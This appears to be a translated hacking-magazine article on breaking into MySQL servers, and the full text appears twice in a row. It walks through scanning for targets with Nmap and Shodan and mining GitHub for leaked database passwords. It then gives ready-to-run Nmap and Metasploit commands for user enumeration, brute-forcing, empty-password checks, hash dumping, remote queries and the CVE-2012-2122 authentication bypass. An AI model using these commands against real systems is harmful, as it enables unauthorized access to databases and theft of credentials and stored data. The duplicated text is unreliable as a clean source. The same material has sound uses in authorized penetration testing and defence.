Instead of a preface
Let's start with a definition. MySQL is a relational database management system that has different data storage engines, such as MyISAM, InnoDB, Archive, and others. Like most open-source projects, it has its forks, such as MariaDB. As a preface, I should mention that most of the vectors/techniques/bugs discussed here apply to various engines and forks, although not always.
WWW
Different versions of MySQL for different platforms can be found here.
Finding Targets
But let's get straight to the point. To break someone, we first need to find them. Let's assume we already know who our target is, know their IP, or are on their local network. We need to scan their address (network) for open ports. By default, MySQL uses port 3306, so that's what we'll be looking for. Every hacker should have Nmap scanner in their arsenal, which allows finding various services, ports on target machines. An example command for scanning looks like this:
nmap -sV -PN -p <port> <ip>
-PN is a very useful thing that tells the program to skip the host discovery stage and go straight to scanning ports. This is necessary if the machine does not respond to ping scanning, but ports may be open on the machine. In this case, without this flag, Nmap will skip this host;
-sV explores open ports to obtain information about the service.
For UDP scanning, the -sU flag must be present.
nmap -sV -Pn -p 3306 172.16.2.114
Nmap scan report for 172.16.2.114
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL (unauthorized)
SHODAN
If you don't have a specific target and want to test your skills, you can use the hacker search engine Shodan. It allows you to search for hosts and output information about various services based on banner responses. It also has the ability to filter by ports, country, city, operating systems, and so on. One of the coolest features is searching for services with anonymous authentication or authentication with standard credentials. It's a very useful service, but it's best to conduct vulnerability testing on your local resources :).
GitHub
One of the coolest features for easy access to databases is searching for source code for any projects on GitHub. Before searching and exploiting SQL Inj on a website, which can take quite a long time (if any are present at all), it's enough to just go to the beloved site for collaborative development, enter a few words, and with some luck gain access to the source code. For some unclear reason, many developers upload their projects to public access - maybe out of foolishness, maybe they are reluctant to pay for a private repository, or maybe they want to share their great code with the whole world, but there is a huge pile of source code on GitHub, from small sites to large projects. This often simplifies the work. For example, if we enter the search query username mysql password database, we can simply pass out from the number of results. Especially many sweet PHP files, in which the connection to the database is written.
Therefore, the first thing we do in pentests is to check GitHub for the presence of client source code. If something is found, you can confidently connect to the database, and then, based on the rights, extract the data you need. But if we couldn't find the coveted username/password lines, don't despair - we can dig through the site source code, if it's present, and conduct an audit not blindly, but with the source code of the service. It significantly facilitates the task of finding vulnerabilities: now we will not just phase blindly, but check certain vectors built on the basis of source code. For example, look at where the database is accessed, whether data filtering from the client is used, and so on.
Tools
There are different ways to search for injections: automatically or manually inserting quotes everywhere (fuzzing); using the trick with GitHub, relying on the carelessness of the developers of the service being investigated. And finally, the moment of truth has come: we have found our long-awaited injection and are ready to fully infiltrate. But here's the problem, we have urgent matters (friends invite us to drink beer), or we are overcome by terrible insurmountable laziness. Don't worry, an excellent tool sqlmap will come to the rescue, which automates the process of searching and exploiting SQL injections, and not just finds a security hole, but fully exploits it. It supports all types of injections. The functionality of sqlmap allows you to: dump databases, automatically search in the database, extract and decrypt logins and passwords, run cmd shell, run an interactive sql shell, in which you only need to write SQL queries to the database, and sqlmap will compose the payload for the injection itself. There is an excellent Cheet Sheet that shows all the possibilities of this tool in two pages.
There are a few more tools that will come in handy in the difficult task of conquering MySQL. They don't need much introduction, as you've probably heard about them many times before. The first is Metasploit, one of the key hacking programs that allows you to create exploits and debug them. The second is the Nmap scanner, which has also been written about in the magazine many times.
There is an abundance of information on all of the listed tools, so we will not delve into the details of their use. If you haven't used them yet, you should definitely do so, and Google and official sites will help you with this. Let's move on.
Information gathering
You need to start with the simplest thing - gathering information. In Metasploit, auxiliary/scanner/mysql/mysql_version is used for this, just a version scanner that can scan a whole pool of addresses:
msf > use auxiliary/scanner/mysql/mysql_version
msf auxilary(mysql_version) > set RHOSTS 172.16.2.54
msf auxilary(mysql_version) > exploit
There is also a module in Nmap that connects to the server and outputs various useful information: protocol, version number, state, and salt.
nmap -sV -sC <target>
Bruteforce
Among the main things that need to be done often is of course bruteforcing - checking for weak or default user passwords. But before starting to guess passwords, you can launch a user enumeration attack. This can be done against version 5.x servers that support old authentication mechanisms (CVE-2012-5615). After scanning, we will know which users exist in the database, which significantly reduces the pool of users for bruteforcing.
nmap --script mysql-enum <target>
Having compiled our pool of usernames and passwords, we proceed to bruteforcing:
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set USER_FILE /root/login/logins
msf auxiliary(mysql_login) > set PASS_FILE /root/login/password
msf auxiliary(mysql_login) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_login) > exploit
Nmap uses standard lists of passwords and users, but you can always use your own:
nmap --script mysql-brute <target>
--script-args userdb=<path> - connect your login list
--script-args passdb=<path> - connect your password list
By the way, here is an excellent repository where you can find the most popular logins, passwords, and more. Usually, during bruteforcing, another simple but quite important check is performed for an empty password for the root or anonymous user:
nmap -sV --script=mysql-empty-password <target>
Post-exploitation
The next important step that comes after obtaining a login/password (through injection or complete enumeration) is post-exploitation. I will list various modules for Nmap and their purpose. So, the module that outputs databases:
nmap -sV --script mysql-databases <target>
The module that outputs users:
nmap -sV --script mysql-users <target>
The module that outputs variables:
nmap -sV --script mysql-variables <target>
The module that outputs users and their hashes in a format convenient for bruteforcing:
nmap -p 3306 <ip> --script mysql-dump-hashes –script args='username=root,password=secret'
msf>use auxiliary/admin/mysql/mysql_hashdump
The module that replaces the MySQL client and sends requests to the remote database:
nmap -p 3306 <ip> --script mysql-query --script-\ args='query="<query>"[,username=<username>,password=<password>]'
msf>use auxiliary/admin/mysql/mysql_sql
Scanning for CVE-2012-2122
It is worth mentioning separately one interesting module that is present in both Metasploit and Nmap - the CVE-2012-2122 check module. This vulnerability allows remote users to bypass authentication due to improper verification of returned values. There is a possibility of authorization with an incorrect password with a probability of 1/256 since MySQL considers the received user token and the expected value to be equal. Using a known username (for example, root, which is almost always present) with any password, you can connect to the database, repeating the connection about 300 times. After that, you can dump all user passwords, bruteforce them, and connect with a legitimate password. But not everything is as good as it seems - only builds where the memcmp() function returns values outside the range from -128 to 127 are vulnerable, so this is a relatively limited number of systems:
Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04);
OpenSuSE 12.1 64-bit MySQL 5.5.23-log;
Debian Unstable 64-bit 5.5.23-2;
Fedora;
Arch Linux.
But if there is even the slightest possibility of getting into the database, it is worth trying:
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > exploit
For Nmap, when scanning, you need to use the mysql-vuln-cve2012-2122 script:
nmap -sV --script mysql-vuln-cve2012-2122 <target>
Let's start with a definition. MySQL is a relational database management system that has different data storage engines, such as MyISAM, InnoDB, Archive, and others. Like most open-source projects, it has its forks, such as MariaDB. As a preface, I should mention that most of the vectors/techniques/bugs discussed here apply to various engines and forks, although not always.
WWW
Different versions of MySQL for different platforms can be found here.
Finding Targets
But let's get straight to the point. To break someone, we first need to find them. Let's assume we already know who our target is, know their IP, or are on their local network. We need to scan their address (network) for open ports. By default, MySQL uses port 3306, so that's what we'll be looking for. Every hacker should have Nmap scanner in their arsenal, which allows finding various services, ports on target machines. An example command for scanning looks like this:
nmap -sV -PN -p <port> <ip>
-PN is a very useful thing that tells the program to skip the host discovery stage and go straight to scanning ports. This is necessary if the machine does not respond to ping scanning, but ports may be open on the machine. In this case, without this flag, Nmap will skip this host;
-sV explores open ports to obtain information about the service.
For UDP scanning, the -sU flag must be present.
nmap -sV -Pn -p 3306 172.16.2.114
Nmap scan report for 172.16.2.114
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL (unauthorized)
SHODAN
If you don't have a specific target and want to test your skills, you can use the hacker search engine Shodan. It allows you to search for hosts and output information about various services based on banner responses. It also has the ability to filter by ports, country, city, operating systems, and so on. One of the coolest features is searching for services with anonymous authentication or authentication with standard credentials. It's a very useful service, but it's best to conduct vulnerability testing on your local resources :).
GitHub
One of the coolest features for easy access to databases is searching for source code for any projects on GitHub. Before searching and exploiting SQL Inj on a website, which can take quite a long time (if any are present at all), it's enough to just go to the beloved site for collaborative development, enter a few words, and with some luck gain access to the source code. For some unclear reason, many developers upload their projects to public access - maybe out of foolishness, maybe they are reluctant to pay for a private repository, or maybe they want to share their great code with the whole world, but there is a huge pile of source code on GitHub, from small sites to large projects. This often simplifies the work. For example, if we enter the search query username mysql password database, we can simply pass out from the number of results. Especially many sweet PHP files, in which the connection to the database is written.
Therefore, the first thing we do in pentests is to check GitHub for the presence of client source code. If something is found, you can confidently connect to the database, and then, based on the rights, extract the data you need. But if we couldn't find the coveted username/password lines, don't despair - we can dig through the site source code, if it's present, and conduct an audit not blindly, but with the source code of the service. It significantly facilitates the task of finding vulnerabilities: now we will not just phase blindly, but check certain vectors built on the basis of source code. For example, look at where the database is accessed, whether data filtering from the client is used, and so on.
Tools
There are different ways to search for injections: automatically or manually inserting quotes everywhere (fuzzing); using the trick with GitHub, relying on the carelessness of the developers of the service being investigated. And finally, the moment of truth has come: we have found our long-awaited injection and are ready to fully infiltrate. But here's the problem, we have urgent matters (friends invite us to drink beer), or we are overcome by terrible insurmountable laziness. Don't worry, an excellent tool sqlmap will come to the rescue, which automates the process of searching and exploiting SQL injections, and not just finds a security hole, but fully exploits it. It supports all types of injections. The functionality of sqlmap allows you to: dump databases, automatically search in the database, extract and decrypt logins and passwords, run cmd shell, run an interactive sql shell, in which you only need to write SQL queries to the database, and sqlmap will compose the payload for the injection itself. There is an excellent Cheet Sheet that shows all the possibilities of this tool in two pages.
There are a few more tools that will come in handy in the difficult task of conquering MySQL. They don't need much introduction, as you've probably heard about them many times before. The first is Metasploit, one of the key hacking programs that allows you to create exploits and debug them. The second is the Nmap scanner, which has also been written about in the magazine many times.
There is an abundance of information on all of the listed tools, so we will not delve into the details of their use. If you haven't used them yet, you should definitely do so, and Google and official sites will help you with this. Let's move on.
Information gathering
You need to start with the simplest thing - gathering information. In Metasploit, auxiliary/scanner/mysql/mysql_version is used for this, just a version scanner that can scan a whole pool of addresses:
msf > use auxiliary/scanner/mysql/mysql_version
msf auxilary(mysql_version) > set RHOSTS 172.16.2.54
msf auxilary(mysql_version) > exploit
There is also a module in Nmap that connects to the server and outputs various useful information: protocol, version number, state, and salt.
nmap -sV -sC <target>
Bruteforce
Among the main things that need to be done often is of course bruteforcing - checking for weak or default user passwords. But before starting to guess passwords, you can launch a user enumeration attack. This can be done against version 5.x servers that support old authentication mechanisms (CVE-2012-5615). After scanning, we will know which users exist in the database, which significantly reduces the pool of users for bruteforcing.
nmap --script mysql-enum <target>
Having compiled our pool of usernames and passwords, we proceed to bruteforcing:
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set USER_FILE /root/login/logins
msf auxiliary(mysql_login) > set PASS_FILE /root/login/password
msf auxiliary(mysql_login) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_login) > exploit
Nmap uses standard lists of passwords and users, but you can always use your own:
nmap --script mysql-brute <target>
--script-args userdb=<path> - connect your login list
--script-args passdb=<path> - connect your password list
By the way, here is an excellent repository where you can find the most popular logins, passwords, and more. Usually, during bruteforcing, another simple but quite important check is performed for an empty password for the root or anonymous user:
nmap -sV --script=mysql-empty-password <target>
Post-exploitation
The next important step that comes after obtaining a login/password (through injection or complete enumeration) is post-exploitation. I will list various modules for Nmap and their purpose. So, the module that outputs databases:
nmap -sV --script mysql-databases <target>
The module that outputs users:
nmap -sV --script mysql-users <target>
The module that outputs variables:
nmap -sV --script mysql-variables <target>
The module that outputs users and their hashes in a format convenient for bruteforcing:
nmap -p 3306 <ip> --script mysql-dump-hashes –script args='username=root,password=secret'
msf>use auxiliary/admin/mysql/mysql_hashdump
The module that replaces the MySQL client and sends requests to the remote database:
nmap -p 3306 <ip> --script mysql-query --script-\ args='query="<query>"[,username=<username>,password=<password>]'
msf>use auxiliary/admin/mysql/mysql_sql
Scanning for CVE-2012-2122
It is worth mentioning separately one interesting module that is present in both Metasploit and Nmap - the CVE-2012-2122 check module. This vulnerability allows remote users to bypass authentication due to improper verification of returned values. There is a possibility of authorization with an incorrect password with a probability of 1/256 since MySQL considers the received user token and the expected value to be equal. Using a known username (for example, root, which is almost always present) with any password, you can connect to the database, repeating the connection about 300 times. After that, you can dump all user passwords, bruteforce them, and connect with a legitimate password. But not everything is as good as it seems - only builds where the memcmp() function returns values outside the range from -128 to 127 are vulnerable, so this is a relatively limited number of systems:
Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04);
OpenSuSE 12.1 64-bit MySQL 5.5.23-log;
Debian Unstable 64-bit 5.5.23-2;
Fedora;
Arch Linux.
But if there is even the slightest possibility of getting into the database, it is worth trying:
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > exploit
For Nmap, when scanning, you need to use the mysql-vuln-cve2012-2122 script:
nmap -sV --script mysql-vuln-cve2012-2122 <target>
